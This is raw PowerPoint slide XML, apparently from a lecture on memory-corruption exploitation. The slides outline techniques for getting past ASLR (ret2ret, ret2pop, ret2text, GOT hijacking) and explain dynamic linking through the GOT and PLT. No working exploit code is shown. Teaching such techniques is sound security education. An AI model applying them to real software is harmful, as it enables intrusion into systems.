                                <p:cTn id="36" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.12541 L -4.68934E-6 -0.1969 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="0" y="-3586"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="38" fill="hold" nodeType="clickPar">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="39" fill="hold" nodeType="withGroup">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="40" presetID="0" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -4.68934E-6 -0.1969 L -4.68934E-6 -0.2559 " pathEditMode="relative" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                    </p:animMotion>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nodePh="1">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:endCondLst>
                                    <p:cond evt="begin" delay="0">
                                      <p:tn val="44"/>
                                    </p:cond>
                                  </p:endCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="17"/>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animBg="1"/>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en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret2ret / ret2pop</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43010" name="Content Placeholder 3" descr="ret2ret.pdf"/>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a:xfrm>
            <a:off x="865188" y="1417638"/>
            <a:ext cx="3322637" cy="5311775"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43011" name="Picture 4" descr="Screen shot 2010-03-01 at 3.40.16 P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75100" y="3508375"/>
            <a:ext cx="41529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5" descr="Screen shot 2010-03-01 at 3.40.40 PM.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75100" y="2914650"/>
            <a:ext cx="4711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3975100" y="1681163"/>
            <a:ext cx="4390670" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>➠ You can use either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>       to point the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="-128"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="-128"/>
              </a:rPr>
              <a:t>      It depends on your strategy.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="79042" y="4845796"/>
            <a:ext cx="2613865" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" spc="-150" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AAAA………………...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" spc="-150" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638262" y="3459531"/>
            <a:ext cx="608808" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1283120" y="2872085"/>
            <a:ext cx="1396763" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1">
              <a:alpha val="80000"/>
            </a:schemeClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>pop - ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1589414" y="1693374"/>
            <a:ext cx="725454" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" tIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msg</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18135385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a:xfrm>
            <a:off x="457200" y="266700"/>
            <a:ext cx="8229600" cy="879475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="990000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" charset="0"/>
                <a:cs typeface="ＭＳ Ｐゴシック" charset="0"/>
              </a:rPr>
              <a:t>How to attack with ASLR?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 1"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="487363" y="1474788"/>
            <a:ext cx="8229600" cy="3554412"/>
            <a:chOff x="487363" y="1474788"/>
            <a:chExt cx="8229600" cy="3554412"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="1474788"/>
              <a:ext cx="8229600" cy="709612"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="B64926"/>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600" b="1" dirty="0"/>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="487363" y="2330450"/>
              <a:ext cx="1501775" cy="1328738"/>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Brute </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Force</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="2330450"/>
              <a:ext cx="2120900" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="595A5A"/>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Non-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>randomized </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>memory</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Rectangle 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="2330450"/>
              <a:ext cx="1951037" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="595A5A"/>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Stack </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>Juggling</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Oval 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="3794125"/>
              <a:ext cx="2120900"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ret2text</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Oval 13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2260600" y="4424362"/>
              <a:ext cx="2120900"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err="1"/>
                <a:t>Func</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
                <a:t>ptr</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Oval 14"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4583113" y="3810000"/>
              <a:ext cx="2120900"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ret2ret</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Oval 15"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4568825" y="4424363"/>
              <a:ext cx="2120900" cy="604837"/>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ret2pop</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="Rectangle 18"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6765925" y="2330450"/>
              <a:ext cx="1951038" cy="1328738"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFB03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GOT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
                <a:t>H</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0"/>
                <a:t>ijacking</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Oval 19"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6772275" y="3810000"/>
              <a:ext cx="1944688"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ret2got</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152931900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990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Other Non-randomized Sections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Dynamically linked libraries are loaded at runtime. This is called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>lazy binding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Two important data structures </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Global Offset Table</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Procedure Linkage Table</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B747839D-A323-47F3-909F-548499399628}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5486400" y="3524072"/>
            <a:ext cx="3035356" cy="1200328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>commonly positioned</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>statically at </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>-time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Brace 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="3657600"/>
            <a:ext cx="228600" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rightBrace">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07493544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990000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dynamic Linking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="990000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1819783"/>
            <a:ext cx="2978050" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“hello ”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>(“world\n”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Lucida Console"/>
              <a:cs typeface="Lucida Console"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4029126" y="1819783"/>
            <a:ext cx="4423279" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
              <a:t>printf@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Lucida Console"/>
                <a:cs typeface="Lucida Console"/>
              </a:rPr>
